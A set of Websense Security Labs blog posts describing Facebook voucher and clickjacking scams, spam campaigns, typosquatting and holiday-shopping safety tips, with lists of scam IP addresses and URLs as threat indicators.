The 2013 Threat Report from the Websense® Security Labs™ is now available.

The report details mobile, social, email and web-based threats, and while it is full of ominous data points, it is a very interesting read. The report is designed to help security professionals keep current with threat trends and improve the effectiveness of existing security solutions. It can also be used to identify and prioritize security gaps that may require new approaches and more innovative strategies.

Creating the report began with the Websense ThreatSeeker® Network, composed of big data clusters used by the WSL to collect and manage up to 5 billion inputs each day from 900 million global endpoints. Malware samples, mobile applications, email content, web links and other information were then passed through deep analysis processes including Websense ACE (Advanced Classification Engine), which applied over 10,000 different analytics.

Here is a sampling of key findings from this year's report:

1. Web Security. The web became significantly more malicious in 2012, both as an attack vector and as the primary support element of attacks originating through social media, mobile devices, and email. Researchers measured an alarming 600 percent increase in the use of malicious web links through all vectors.
2. The Social Web. Malicious content was hidden within social media behind shortened web links 32 percent of the time. Social media attacks took advantage of the confusion of new features, changing services and unsophisticated users.
3. Mobile Security. A study of last year's malicious apps revealed how they often abuse permissions; especially in the use of SMS communications, something very few legitimate apps do. Risks also increased as mobile devices were used for social media and web surfing more often than actually making a phone call.
4. Email Security. Only 1 in 5 emails sent were legitimate, as spam increased to 76 percent of email traffic, and 92% of spam included links to potentially malicious content. Phishing threats delivered via email also grew.
5. Malware Behavior. Forensic analysis identified that registry modification behavior in malware has declined to 7.7%. Once a key indicator of malicious behavior, malware has now become increasingly Internet-connected. Half of all malware that used the Internet for communications and downloaded additional malicious executables to extend their attack capabilities in the first 60 seconds.
6. Data Theft. Key changes in data theft targets and methods took place last year. Reports of intellectual property (IP) theft increased, and theft of credit card numbers and other Personally Identifiable Information (PII) continued to grow. Hacking, malware and other cyber-threats continued to be common methods of attack. However, some of the largest thefts involved physical penetration of security as well, often by willful employees.

Because today's attacks occur in multiple stages through numerous vectors, the report includes an appendix on The Seven Stages of Advanced Threats. This methodology for analyzing and classifying cyber-attacks provides a useful framework for organizations to assess their current defenses against their security profile, identify weaknesses and develop a more comprehensive strategy for withstanding next-generation attacks. A summary of the Websense 2013 Security Predictions report is also included for planning purposes.

Click for a video introduction or download a copy of the 2013 Threat Report.

Last week we wrote a blog about a Facebook scam that appeared to spread rather aggresively. We decided to nickname the scam "Jacked Frost." The Websense® ThreatSeeker® network detected that the scam has increased and multiplied over the weekend - particularly on Saturday where we saw the amount of unique URLs related to this scam double. This shows how cyber crooks time their attacks to times where users are more laid back and when the security community is less likely to alert users on this type of threat.

Here is the link to our blog that describes this in more detail. The scam spreads using click-jacking techniques and employs a mass number of varied scam hosts by using the infrastructure of the legitimate service at freedns.afraid.org.

 Websense customers are protected against this threat with Websense ACE (Advanced Classification Engine). 

A graph showing the volume of unique scam URLs vs. active URLs (available URLs) over the past few days:

Screenshot of the scam's main page:

How the scam looks like in Facebook's new feed. The scam uses varied sexual implied images and varied enticing wording to lure for user's clicks:

From time to time the Websense® ThreatSeeker® Network detects high volume surges of badness rolling across Facebook. In the past 48 hours we've seen a rapid increase of a particular scam campaign that has aggressively spread through the world's largest social networking site. 

With the holiday shopping season here, it appears that cybercrooks are going full throttle to attract Christmas shoppers by piggybacking on the reputation of well-known brands such as Walmart, Asda, Visa, Best Buy, Apple and others. In the attack that we're about to describe, it appears that user accounts belonging to the free DNS service freedns.afraid.org were used as part of the cybercriminals' scam infrastructure. Read on for details.

The scam varies in appearance, is geolocation aware, and serves content based on the location of the victim. Potential victims are enticed with videos and free shopping vouchers. Here are some examples of how it might look in a Facebook news feed:

The scam in a Facebook news feed 

What happens when a scam post is clicked?

When a scam link is clicked in the news feed, the victim is redirected to a fake Facebook page that hosts a fake video that pretends to show the "Fail Blog Daily Video." A clickjacking technique is employed on the page so that when the victim clicks on the video's play button, it results in one of two outcomes:

1. A browser popup is launched and the victim is asked to "Like" a certain scam post. This is done to propagate the scam further because liking it causes it to appear on the victim's news feed.
(Click here to see what it looks like; a new browser window will open.)

2. The victim is redirected to fake video page that uses the CPA advertising method to "unlock" what is supposedly a YouTube video.
(Click here to see what it looks like; a new browser window will open.)

This isn't the end, though. The page also has a timeout mechanism.  If the victim doesn't play the video they are greeted with a "Merry Christmas!" message and are redirected to a fake Facebook page offering some fake free vouchers.  In the following example, some fake Asda vouchers are offered:

 Christmas-themed congratulation:

The scam is geolocation aware:

Here is a scam page offering some free vouchers from Asda.  This particular page is desgined for UK-based visitors:

This scam page offers vouchers and rewards from Walmart, Best Buy and Visa.  This particular page is desgined for US-based visitors:

This scam page offers vouchers and rewards from Walmart and American Express.  This particular page is designed for US-based visitors:

As mentioned, the scam comes in many variations and piggybacks on the reputation of many well-known brands. Let's have a look at the example from above that piggybacks on Asda. The fake voucher page for Asda takes the victim through the scam step by step. First, in order to get the free voucher the victim has to share the voucher in their Facebook profile. Second, the victim must publish the comment "Thanks Asda!" to support the scam. Lastly, the user must click the Like button, which is a scam link.  

After the victim completes the steps, their Facebook news feed includes the fake voucher scam and they are redirected to a legitimate website at new.activeyou.co.uk that gives out prizes and supports an affiliate program. The way this works is that any user coming to the site --  thanks to a certain affiliate -- and who participates, earns the affiliate some money; there is no free voucher after all. The affiliate here obviously engages in illegal methods to advertise and generate traffic to a website that earns them money.  The affiliate ID is seen in the next image, marked in red in the URL where it states affid.

No free vouchers after all:

The scam infrastructure and intelligence: accounts on Afraid.org as doorways

Websense's partnership with Facebook alerts us and invites us to assist Facebook in mitigating such scams using Websense ACE. We released this blog because we saw a spike in our data feeds and a rather large number of different URLs that are used for scam purposes that have a relation to each other. We think that Facebook is doing a good job of cleaning up and removing posts related to this scam.

We spotted more than 3,000 unique URLs used for this scam on Facebook.  The high variation is used by cyber criminals to assure persistence and redundancy in case some URLs or domains get blacklisted.

The scam peak as seen by the ThreatSeeker Network. This plots the number of new hosts seen hosting the scam vs. the number of active hosts using this scam.

One of the most interesting findings is that most of the scam hosts used in the attack use the DNS servers of the free service at freedns.afraid.org. Essentially we found that all the name-server records used by websites involved in the attack use Afraid.org DNS server and point to ns1.afraid.org (see illustration below)

freedns.afraid.org is a free service that offers domain owners free DNS services. For example, a domain owner can use the DNS servers of freedns.afraid.org and have them point to their website's IP address. freedns.afraid.org also allows users to manage those free DNS services via an account. It allows account holders to add various subdomains to their main domain and optionally point those new websites to different IP addresses. For example, if John Doe owns johndoe.com on IP address x.x.x.x, he can go to freedns.afraid.org, create an account, and use their DNS servers to point to their website IP address at x.x.x.x. On top of that, John can easily add DNS records to subdomains of his main website (johndoe.com) via his account at freedns.afraid.org. At his option, John can have those subdomains (that essentially represent different web sites) point to different IP addresses. So, for example, John can use his DNS account with freedns.afraid.org to have johnsfriend.johndoe.com point to y.y.y.y.

Scam host example and its DNS record:  91037997396662norryyoutubecomplay10pegahihypupegahihypu.opbco.web74.net

In this attack, accounts/hosts on freedns.afraid.org have been used to serve scams URLs by pointing subdomains of legitimate hosts to the attackers' infrastructure. If we examine some of the scam hosts involved in the attack, we can see that they point to a different IP address than the one used at the host level. Websites at the host level vary in purpose and appear to be legitimate. We verified that this pattern is consistent with all of the approximately 3000 instances that we found involved in the attack. In the next example, we present an example scam URL that is used for the scam that is hosted on an IP address that cybercriminals are using to host the scam (213.152.170.193), while the host is hosted on a different IP address that hosts a legitimate website (65.96.116.101), in this case a personal cooking blog. Looking at other websites hosted on the offending 213.152.170.193 reveals more scam websites:

urbancooking.net appears to be a personal blog about cooking:

Exploring other websites hosted on the offending 213.152.170.193 reveals more scam websites:

 Here are some of the offending IP addresses found to be part of the scam infrastructure hosting the scam websites:

208.73.210.147
213.152.170.193
184.107.164.158
216.172.174.53
199.188.206.214
198.187.30.161
198.154.102.28
68.168.21.68
198.154.102.29
174.132.156.176
198.154.102.27
88.191.118.153
208.91.199.252

We believe that this attack is now under control and is being successfully mitigated by Facebook. We're seeing a gradual decline in incidences, but it's safe to say that while it's declining it's still going strong. We're going to keep an eye on events related to this attack and keep you in the loop.

Also, we would also like to take this opportunity to wish you a merry and cybersafe holiday season.

Many of our colleagues, customers and readers would have now enjoyed their fill of turkey and pumpkin pie for Thanksgiving and are preparing for a second day of festivities with the arrival of Black Friday.  This traditionally, for North American retailers and consumers, marks the start of the holiday shopping season and although it is not observed for many as a national holiday, more and more retailers across the globe are launching Black Friday promotions in order to entice consumers and increase sales.  Additionally, given that Black Friday is typically a physical 'bricks-and-mortar' retail affair, online retailers seek to continue the shopping frenzy with additional offers, promotions and sales with Cyber Monday, a marketing term coined in 2005 by Shop.org.

Of course, retailers and consumers are not alone in their preparations for the shopping period and here at Websense® Security Labs™, the Websense ThreatSeeker® Network continues to detect and protect customers from numerous malicious campaigns that look to exploit bargain hunters and shoppers throughout this period.

Malicious campaigns detected and blocked thus far, predominately play upon Black Friday themes to spam-promote scam websites offering loans, fake degrees and such like. We also see scams that entice victims to complete survey scams in order to harvest personal information.

In addition to wearing appropriate clothing and footwear as well as remembering to drink sufficient amounts of water, Security Labs presents our Black Friday/Cyber Monday Survival Guide:

#1 "If it looks too good to be true..."
Large retailers may offer knock-down prices and fantastic first-come-first-served deals however, think twice before clicking on that email link or completing that purchase on that 'new' website you've just found.

Fake websites are created by scammers to entice buyers using terminology such as 'wholesale prices' or 'liquidated stock'. Combine this with a Black Friday or Cyber Monday deal and you could be convinced that you've just secured the latest gadget at a fraction of the retail price. In reality, you're handing over your payment details to a scammer who will at best only charge you for the fictitious goods.

Apple products for less than half the retail price... Really?

These scams are unfortunately not limited to dedicated scam websites and individual fictitious products infiltrate well-known online retailers and auction sites. Successfully purchasing bargains through third-party sellers via a retailers 'marketplace' or an online auction is common practice, however, apply rule #1 and consider rule #2.

Remember: If it looks too good to be true... it probably is"

#2 "It takes many good deeds to build a good reputation..."
Many interactions in our everyday lives rely on reputation and our online interactions should be no different. Just because an email claims to be from a particular retailer or organization it doesn't mean that it is. Many online retailers have spent a great deal of time and effort building their reputation and are unlikely to dilute their brand by sending emails from free webmail accounts or creating websites on obscure URLs.

If you have suspicions regarding an email or link don't follow it. Go directly to the organization's website before logging-in or making a purchase and don't be afraid to contact an organization to verify the validity of something you've received. 

Suspicious URLs can also be checked using our ACEInsight Site Analysis tool, a free service powered by the Websense TRITON™ architecture that will perform a real-time security and content classification check.

If you're submitting any personal information online; many retailers will use additional security features such as HTTPS and Extended Validation Certificates (EV) and these are evident by a padlock icon and organization name appearing on the address bar in green. These steps indicate that additional verification steps have been taken and confirm that authenticity of the website you're visiting, if you're making an online purchase or submitting personal or financial information these measures also help to secure your data in transit and protect it from prying eyes (man-in-the-middle attacks).

Reputation confirmed by an Extended Validation Certificate

If you're considering a purchase from a marketplace seller or online auction remember to review ratings or feedback and confirm that they are reputable. Additionally, avoid using payment methods outside of the marketplace or auction site as these are common scam traits - not only are you likely to fall outside of any payment protection schemes, many scammers will encourage you to use money transfer methods that are difficult to track and recover.

Remember: "It takes many good deeds to build a good reputation, and only one bad one to lose it." - Benjamin Franklin


#3 "Loose lips..."
It's possible that not even your closest friend knows your date of birth (for those of us above a certain age), your mother's maiden name or indeed the name of your first goldfish let alone your PIN, card verification code and credit-card number! Given this, think carefully before surrendering this information and be suspicious of any email, website or social network post that requests personal and/or financial information... you may find that your details are being used to fund someone else's shopping-spree!

Phishing campaigns, as shown in our recent Insights Blog, are most popular on Mondays and Fridays which just so happens to tie-in with this weekend's busy shopping period. Financial organizations and retailers are highly unlikely to ask you to 'Verify your account' or 'Unlock your account' and then have you submit all of your personal details again. If in doubt, visit the organizations website directly or contact them via alternate means to confirm their request.

If you're submitting any personal information online, confirm the reputation (rule #2) of the organization. Will they be protecting your data and using it for its intended purpose? Or is this a ruse to gather personal information for further spam/scam campaigns or even identity theft?

Remember: "Loose lips sink ships!"

#4 "There's no such thing as a free lunch..."

As often the case when invited to lunch with family members, we may pay a small price for lunch by fixing that printer problem or removing malware from the abused family PC... a small price compared to the time and effort required to put the meal in front of you. In the case of scammers, the free lunch or more to the point 'free gift card' or 'free hugely popular consumer electronic device'  is offered in return for the simply filling in an online survey or completing a qualifying purchase in order to secure that vastly more expensive item.

Commonly these scams utilize emails and social network posts claiming to be from popular brands informing you that 'You have received a gift card from us' or 'Giveaway'. The links of course, if not leading you to malicious websites that could potentially compromise your machine, lead you through a series of sites to harvest your personal information and/or entice you into purchasing memberships, ebooks and other items all in order to secure that great freebie.  Once harvested, your data at best could be passed to marketing organizations to further target you, or at worst for identity fraud.

Free iPad?

Free giftcard?

Ask yourself the question, would the brand really give away high-value gift-cards and goods in return for a completed survey? Whilst prize draws and money-off coupons are common rewards, consider our other survival guide tips before answering the question.

Remember: "There's no such thing as a free lunch... somebody has to pay"


#5 "Attachment is the great fabricator of illusions..."

Here in Security Labs, we've seen, blogged about, and protected customers from countless malicious email campaigns which misuse popular brand identities to entice trusting consumers to open malicious attachments which then lead to the compromise of their machines. Whilst no specific examples of Black Friday / Cyber Monday malicious emails are being detected at the time of writing, this attack vector could easily be exploited to take advantage of those of us waiting for an all-important email laden with shopping bargains.

However enticing, interesting or compelling an email attachment looks - don't open it unless you are sure of its source.

Attached order confirmations or coupons may appear to be legitimate, particularly when you're placing a number of orders online. Confirm that these are related to transactions that you've made and consider the behavior. Is it normal for this particular retailer to send you the order confirmation as an attachment rather than within the actual email?

Remember: "Attachment is the great fabricator of illusions; reality can be attained only by someone who is detached." - Simone Weil

#6: "The hair is real..."

Those of you camping outside stores awaiting the bargain stampede are sure to be using mobile devices to stay up-to-date with the latest offers and news... but how do you keep on top of numerous retailers and offers? A quick search on any mobile application store or marketplace is sure to reveal any one of a number of apps that will take care of this task for you, aggregating numerous news feeds, offers and store deals into one handy app. The question is, can you trust it? As seen with the launch of many high-profile mobile games and applications, attackers exploit mobile users by publishing fake applications which may give you a little more than you've bargained for... perhaps premium-rate SMS ,or just harvesting personal data from your smartphone.

Before installing any application, be sure to check the permissions that it's requesting . Does a simple offer app really need the ability to modify or delete items on your smartphone's storage card? How about it integrating with your phone book? If in doubt, don't install it. And, of course, check the reviews to confirm that the app's reputation is trustworthy.

Remember: "The hair is real; it's the head that's fake." - Steve Allen

#7: "I alone cannot change the world..."

In the sense of community and coming together, please do leave a comment and share anything suspicious you encounter this weekend. Whilst we've prepared this survival guide, albeit in a light-hearted fashion, for Black Friday and Cyber Monday, these threats and our guidelines are relevant throughout the year. Enjoy your shopping and stay safe. And by all means drop us a line if you find any real 'highly desirable consumer electronic gadgets' at a knock-down prices!

Remember: "I alone cannot change the world, but I can cast a stone across the waters to create many ripples." - Mother Teresa

The Websense® ThreatSeeker® Network has detected an unsolicited email campaign in which love-struck or curious recipients may have their appetites whetted by the thought of a secret admirer. Although Websense customers are protected from this and other threats by ACE™, our Advanced Classification Engine, this post provides an insight into the campaign, which appears to be on the increase today.

The messages, sent from various Yahoo.com accounts, suggest that the sender has "to let you know how [they] feel" and provide an enticing Facebook link to "View Your Ecard".

As displayed above, a valid short Facebook URL is used which, in this case, redirects to hxxp://www.facebook.com/pages/32942390324/536822983001617?sk=app_190322544333196. This particular page, which appears to have been created today (October 1, 2012), makes use of a third-party Facebook app 'Static HTML App.' This app embeds the following code:

The code sends a 'signedRequest' string (as seen in the highlighted URL above), which then requests the desired content for rendering in the victim's browser. In this case, a basic JavaScript is delivered:

The victim's browser is then directed to a fake ecard site hxxp://readyourecard.com/viewmessage/?a=vip36 which, according to Whois data, was registered on September 20, 2012 by 'Liu Hongmei' in China:

At this point, the aim of the campaign becomes clear: Every link on the fake ecard page redirects to an affiliate landing page on the Adult Dating website AdultFriendFinder.com and, with affiliate earnings of up to $1 per unique visitor, you can easily see how such a campaign could become very lucrative!

This campaign appears to be financially driven, but it is conceivable that the same techniques could be used to direct victims to malicious sites. Given that the redirection starts from an innocent-looking Facebook page, users should consider themselves warned to tame their curiosity and not click on unsolicited links!

First it was the Cheesecake Factory; now, it’s Timeline. Facebook, like many other social networking companies, is experiencing some user dissatisfaction, and scammers are taking advantage of anti-Timeline sentiment. According to Insidefacebook, scammers are creating pages that assure the public that by “liking” the page, watching the linked video, downloading a certain browser application, or inviting their friends to the page, they will be allowed to opt out of Timeline.

These pages all ask readers to "Like" the account, and some even ask them to subscribe. Some pages ask readers to install a browser application; Google Chrome and Firefox are common targets of such scams. Though some Facebook pages may look harmless, remember that being cautious is the best way to prevent potential data loss.

Timeline was introduced by Mark Zuckerberg during the F8 developer conference. There, he announced that the beta version of the interface would be available to Facebook users on September 22nd. 

So, what is Timeline? Facebook engineers implemented an algorithm that gathers all of your Facebook activity and organizes it based on what it deems important: your birth, high school graduation, first job, wedding, special events, and so on. The Timeline profile page is divided into two columns that contain recent photos, games, posts, and other activity. Since the algorithm decides what is relevant and what is not, there is a chance an event or a post you think is relevant might not show up in Timeline.  But fear not, the new page layout will allow editing so that users can manually change what information is shared or deemed important. 

Facebook employee Paul McDonald explains that Timeline allows users to add details of their lives before Facebook was created, providing an easy way to rediscover things once shared in real life. You have seven days to review and modify the timeline before it goes live and anyone else can see it. 

As long as Facebook remains the top social networking site, scammers will use new and innovative methods to try to steal and exploit user information, but rest assured that ACE  (Advanced Classification Engine) protects our customers from such scams.

Timeline

A while back, we blogged about some upcoming changes on Facebook. The new Timeline layout is now ready for release. All Facebook accounts will be updated to the new Timeline layout on December 29, 2011.

You may already have noticed changes in some profiles. Timeline has been accessible to all users for a while, giving them the choice to publish or simply modify their Timelines prior to the December 29 release. 

We're interested to know what you think of these new Facebook features. Please enter your comments at the bottom of this blog post. 
And keep in mind that Websense technology can protect your Timeline from spam, malicious links, and unwanted comments.
(Read here about the security partnership with Facebook that we announced in October.) 

Sponsored Stories

In January 2012, Facebook users will start to see their photos appear in third-party advertisements in News Feeds. Facebook’s new “Sponsored Stories” feature will appear in the Ticker section – a feature released earlier this year and located on the right-hand side of the Facebook page.

Users will see targeted Sponsored Stories based on their friends' and their own “Page likes,” check-ins, app shares, games played, and so on. These stories are visible only to people who are already eligible to see your News Feed story.

For example, if you own a small business and you want people to hear about you, you can pay to have activity posted in the Sponsored Stories column. These postings are based only on the actions of users' friends. Your business is more credible because the link comes from a friend.

Facebook will implement this feature slowly, starting with one advertisement per day per user. According to a Facebook spokesperson, up to 10% of the stories appearing in the Ticker will be Sponsored Stories.

As the leading web content classification and security firm, and as a security partner with Facebook, Websense tracks these trends closely. We do not see increased security risks based on Sponsored Stories, but let us know what you think.

Scams on Facebook are a daily thing. Websense® Threatseeker® Network recently detected some Facebook scams that now utilize the power of browser extensions to spread to other users' profiles. Scam pages typically utilize social engineering tricks - like enticing users with videos or offers for a free voucher, all of which lure victims to take part in the scam. Now on top of that, we've found that victims are also asked to install a browser plugin. The plugin is an integral part of how the scam is spread. Once installed, the plugin connects to a script that uses the Facebook API and then posts the scam to the victim's friends' pages. One of the advantages of using a plugin is the ability to persist in the victim's browsers and propagate to other profiles - that is similar to malicious Facebook applications we've seen before.

We have noticed that at the moment, only Chrome and Firefox plugins are used. This is how a sample scam page looks using Chrome and Firefox browsers respectively:

The code checks which browser is installed and serves the compatible malicious plugin. Chrome plugin files end with a CRX file extension and Firefox plugin files end with the XPI file extension. Chrome and Firefox plugin files come in a compressed form. Looking inside these malicious plugins reveals some code that loads a script from external websites. This code is ultimately loaded by the browser that connects to Facebook. The code posts in the victim's name on the victim's friends pages, which results in the victim further spreading the scam, spam, and possibly malware. To see the code behind the plugin of the scam shown above, take a look at these next images:  

Here is another example of a scam with the same concept. The next two images show a 'Cheesecake Factory' voucher scam offering to download a Chrome plugin and how the scam looks like in Facebook's news feed:

 Websense Advanced Classification Engine, or ACE, helps protect users from such scams.

Websense® ThreatSeeker® Network detects that a new spam campaign is spreading on Facebook and ibibo (a popular game site in India). The content of the spam messages is: "Lost 30 pounds in just 4 weeks all thanks to hcg. Check it out: http://spam_url".

We have seen a number of similar spam campaigns on Facebook such as, "Sexiest Video Ever" on Facebook", "Osama bin Laden scams on Facebook", etc. But, unlike previous campaigns which took advantage of a hot topic to lure visitors to click the link in the spam post, here the attackers publish a comment in the name of the account owner: "Never thought losing weight could be so easy!!!". With this method, some of the account owner's friends can be tricked into clicking the spam link:

For the Facebook version of the attack, the attackers abused the blogspot.com service. Here are some of the URLs used for the attack:

http://learn-how-to-be-thinghhfwi.blogspot.com

http://learn-how-to-be-thing3lk8o.blogspot.com

http://find-out-how-to-be-thing5nuhl.blogspot.com

http://find-out-how-to-be-thingpmgbg.blogspot.com

http://learn-how-to-be-thingiihfz.blogspot.com

http://learn-how-to-be-thing4m4wr.blogspot.com

http://learn-how-to-be-thingrebrl.blogspot.com

http://learn-how-to-get-thingqvg34.blogspot.com

http://learn-how-to-be-thing0jk0h.blogspot.com

http://find-out-how-to-get-thingczign.blogspot.com

The spam link redirects victims to another spam site. At the moment, the spam site is unavailable, but the attackers can always update the sites with malicious content.

http://ad2ac.com/?s=15yy1

http://zcwqa2.com/?s=15yy2

The spam link used in Ibibo is new registered sites. Still unavailable now.

http://diet-news.m9q.report.qfz.htttp96.com/

http://diet-news.1tc.report.n8e.httpai.com/

http://diet-news.gxf.report.wxb.htttp92.com/

http://diet-news.ejp.report.3ok.http1m.com/

http://diet-news.z1o.report.yl9.httpv1.com/

http://diet-news.e86.report.i63.http1n.com/

http://diet-news.d8b.report.1b2.httpao.com/

http://diet-news.4rv.report.ezi.httpum.com/

http://diet-news.ice.report.75l.httpmn8.com/

http://diet-news.wja.report.95k.htttp45.com/

http://diet-news.aki.report.uks.httpy4.com/

http://diet-news.5fh.report.yeb.http1c.com/

http://diet-news.ly8.report.o4i.httpvv8.com/

Websense customers are protected from these threats by ACE, our Advanced Classification Engine.

Do you often make mistakes when typing? Is the Backspace key your friend? Well, you are not alone!
Most of us make typing errors once in a while, but what if those errors could cause data leakage? 

Typosquatting exploits common typing errors made when entering a Web address in a browser--typing “a” instead of “s”, for example, or “e” instead of “r”--resulting in URL hijacking, malware injection, or phishing. Popular social networking sites, like Facebook, are often targets of typosquatting. With over 800 million active users, it’s no surprise the social networking giant is a target of such exploits.

Say you’re in a hurry to check out the latest update from your friends on facebook.com, but in your excitement, you enter faccenook.com instead.  There could be several outcomes. If the Web site designers anticipated your clumsiness, you still get to the desired destination. Otherwise, you might get an error message saying that the page is unavailable.  Or you could get a page that looks like facebook.com, but that actually redirects you to phishing or other potentially harmful sites, injects malware, infects your system with spyware, and ruins your day.

After carefully studying the objectionable links generated by common typos for Facebook, we found that over 62% of links lead to bot networks, phishing, or malicious web sites. 

Websense Security Labs researchers investigated the top ranked domain (www.facebook.com) and generated common typos based on keyboard character distance, common repeats, and even omissions, anticipating common typos that result in fake or malicious pages. Websense software protects users, their data, and their systems with its unique backtracking algorithm to identify altered domain names. The Advanced Classification Engine (ACE) provides real-time content analysis to keep you safe no matter how bad a tyspist yu aree.